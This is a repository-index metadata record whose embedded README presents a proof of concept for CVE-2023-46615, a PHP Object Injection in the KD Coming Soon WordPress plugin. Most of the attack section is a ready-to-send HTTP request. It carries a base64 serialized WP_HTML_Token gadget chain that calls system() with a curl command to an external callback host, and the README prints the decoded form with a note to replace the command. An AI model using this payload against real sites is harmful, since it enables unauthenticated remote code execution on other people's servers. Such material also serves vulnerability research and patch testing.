{"id":21125709,"url":"https://github.com/randomrobbiebf/cve-2023-46615","last_synced_at":"2026-01-02T15:05:17.550Z","repository":{"id":210060803,"uuid":"725628979","full_name":"RandomRobbieBF/CVE-2023-46615","owner":"RandomRobbieBF","description":"KD Coming Soon \u003c= 1.7 - Unauthenticated PHP Object Injection via cetitle","archived":false,"fork":false,"pushed_at":"2023-11-30T14:51:04.000Z","size":2,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-21T05:41:43.118Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-11-30T14:46:21.000Z","updated_at":"2024-07-11T16:40:03.000Z","dependencies_parsed_at":null,"dependency_job_id":"86d35aa6-ecd7-4ee4-b3aa-2b0dc84b42e2","html_url":"https://github.com/RandomRobbieBF/CVE-2023-46615","commit_stats":null,"previous_names":["randomrobbiebf/cve-2023-46615"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-46615","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-46615/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-46615/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-46615/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2023-46615/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243573163,"owners_count":20312879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:28.532Z","updated_at":"2026-01-02T15:05:17.541Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2023-46615\nKD Coming Soon \u0026lt;= 1.7 - Unauthenticated PHP Object Injection via cetitle\n\n### Description:\nThe KD Coming Soon plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.7 via deserialization of untrusted input cetitle in the vulnerable kd_cemailer function. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.\n\n```\nSeverity: high\nCVE ID: CVE-2023-46615\nCVSS Score: 8.1\nCVSS Metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\nPlugin Slug: kd-coming-soon\nWPScan URL: https://www.wpscan.com/plugin/kd-coming-soon\nReference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/0f831d48-733a-4e79-8559-92b03b8d0356\n```\n\nPOC \n--- \nOnly works for wordpress 6.4+\n\n```\nPOST /wp-admin/admin-ajax.php?action=kd_cemailer\u0026nonce=c0465c51ee HTTP/1.1\nHost: wordpress.lan\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 231\nOrigin: http://wordpress.lan\nConnection: close\nReferer: http://wordpress.lan/\n\naction=kd_cemailer\u0026cetitle=TzoxMzoiV1BfSFRNTF9Ub2tlbiI6Mjp7czoxMzoiYm9va21hcmtfbmFtZSI7czo0OToiY3VybCB1NHpjNXI5N3B2ZnF1NHgwMXNlenRlbmprYXExZXUyai5vYXN0aWZ5LmNvbSI7czoxMDoib25fZGVzdHJveSI7czo2OiJzeXN0ZW0iO30%3d\u0026email=test%40Test.com\n```\n\nurlcode and base64decode `TzoxMzoiV1BfSFRNTF9Ub2tlbiI6Mjp7czoxMzoiYm9va21hcmtfbmFtZSI7czo0OToiY3VybCB1NHpjNXI5N3B2ZnF1NHgwMXNlenRlbmprYXExZXUyai5vYXN0aWZ5LmNvbSI7czoxMDoib25fZGVzdHJveSI7czo2OiJzeXN0ZW0iO30%3d` and replace the curl command `O:13:\"WP_HTML_Token\":2:{s:13:\"bookmark_name\";s:49:\"curl u4zc5r97pvfqu4x01seztenjkaq1eu2j.oastify.com\";s:10:\"on_destroy\";s:6:\"system\";}`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-46615","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2023-46615","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-46615/lists"}